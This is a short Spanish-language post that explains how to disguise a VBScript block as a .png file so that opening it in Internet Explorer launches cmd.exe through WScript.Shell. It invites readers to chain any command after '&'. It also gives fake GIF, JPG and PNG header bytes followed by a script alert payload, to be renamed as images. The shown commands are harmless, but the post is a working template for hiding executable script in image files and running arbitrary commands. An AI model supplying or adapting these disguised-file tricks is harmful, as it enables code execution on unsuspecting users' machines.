Guardar esto en el bloc de notas como .png abrir imagen desde internet explorer vía http://imagen.png y se ejecutara el CMD, para cambiar los comandos solo pongan un & antes del comando.

 
 
 
 
 
<script language="vbs">
on error resume next
Set shell = createObject("Wscript.shell")
shell.run("cmd.exe /c @echo off & color a & echo hola & pause>nul & exit")
</script>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
==========================================
 
 
 
 
 
 
 

Otro ejemplo, guardar los siguientes códigos en un txt renombrarlos a una de las opciones i abrir la imágen con internet explorer

 
GIF:
%137%71%73%70%13%10%26%10%00%00%00%13%00%00%00%01%00%00%00%01 
script alert('Mirulu');script
JPG:
%137%74%80%71%13%10%26%10%00%00%00%13%00%00%00%01%00%00%00%01 
script alert('Mirulu');script
PNG:
%137%80%78%71%13%10%26%10%00%00%00%13%00%00%00%01%00%00%00%01 
script alert('Mirulu');script